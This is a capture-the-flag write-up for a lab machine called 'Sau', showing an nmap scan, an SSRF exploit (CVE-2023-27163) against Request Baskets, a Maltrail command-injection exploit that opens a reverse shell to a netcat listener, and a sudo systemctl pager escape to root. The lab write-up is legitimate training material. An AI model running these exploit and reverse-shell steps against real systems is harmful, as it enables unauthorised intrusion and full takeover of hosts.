Sau | CTF WRITE UP | Justakazh Docs

Information Gathering

Ports and Services

┌──(kali㉿kali)-[~/ctf/sau]
└─$ nmap -p- -sV 10.10.11.224 --min-rate 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-14 12:34 WIB
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 12:34 (0:00:00 remaining)
Stats: 0:00:17 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 12:35 (0:00:06 remaining)
Nmap scan report for 10.10.11.224
Host is up (0.090s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp    filtered http
8338/tcp  filtered unknown
55555/tcp open     http    Golang net/http server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

https://sploitus.com/exploit?id=6BAA524E-16EA-562C-804B-113B8244C6EA (CVE-2023-27163
)

┌──(kali㉿kali)-[~/ctf/sau]
└─$ ./CVE-2023-27163.sh -t http://10.10.11.224:55555/ -a http://127.0.0.1:8338    
>> Creating the basket: "xluypv"
>> Basket created! -> http://10.10.11.224:55555/xluypv

https://github.com/spookier/Maltrail-v0.53-Exploit

┌──(kali㉿kali)-[~/ctf/sau]
└─$ python3 exploit.py 10.10.16.20 80 http://10.10.11.224:55555/xluypv
Running exploit on http://10.10.11.224:55555/xluypv/login

┌──(kali㉿kali)-[~/ctf/sau]
└─$ nc -lnvp 80   
listening on [any] 80 ...
connect to [10.10.16.20] from (UNKNOWN) [10.10.11.224] 36432
$ id
id
uid=1001(puma) gid=1001(puma) groups=1001(puma)

Priv esc

puma@sau:~$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
puma@sau:~$

https://gtfobins.github.io/gtfobins/systemctl/ (c)'

This invokes the default pager, which is likely to be less, other functions may apply.

puma@sau:/opt/maltrail$ sudo /usr/bin/systemctl status trail.service
sudo /usr/bin/systemctl status trail.service
WARNING: terminal is not fully functional
-  (press RETURN)
● trail.service - Maltrail. Server of malicious traffic detection system
     Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset:>
     Active: active (running) since Wed 2025-05-14 05:51:15 UTC; 4min 31s ago
       Docs: https://github.com/stamparm/maltrail#readme
             https://github.com/stamparm/maltrail/wiki
   Main PID: 1957 (python3)
      Tasks: 12 (limit: 4662)
     Memory: 24.6M
     CGroup: /system.slice/trail.service
             ├─1957 /usr/bin/python3 server.py
             ├─1981 /bin/sh -c logger -p auth.info -t "maltrail[1957]" "Failed >
             ├─1982 /bin/sh -c logger -p auth.info -t "maltrail[1957]" "Failed >
             ├─1987 sh
             ├─1992 python3 -c import socket,os,pty;s=socket.socket(socket.AF_I>
             ├─1993 /bin/sh
             ├─2016 python3 -c import pty;pty.spawn("/bin/bash")
             ├─2017 /bin/bash
             ├─2027 sudo /usr/bin/systemctl status trail.service
             ├─2028 /usr/bin/systemctl status trail.service
             └─2029 pager

May 14 05:53:11 sau sudo[2001]:     puma : TTY=pts/0 ; PWD=/opt/maltrail ; USER>
May 14 05:53:24 sau sudo[2002]:     puma : TTY=pts/0 ; PWD=/opt/maltrail ; USER>
lines 1-23!sh
!sshh!sh
# id
id
uid=0(root) gid=0(root) groups=0(root)

PreviousKeeper NextBroker

Last updated 7 months ago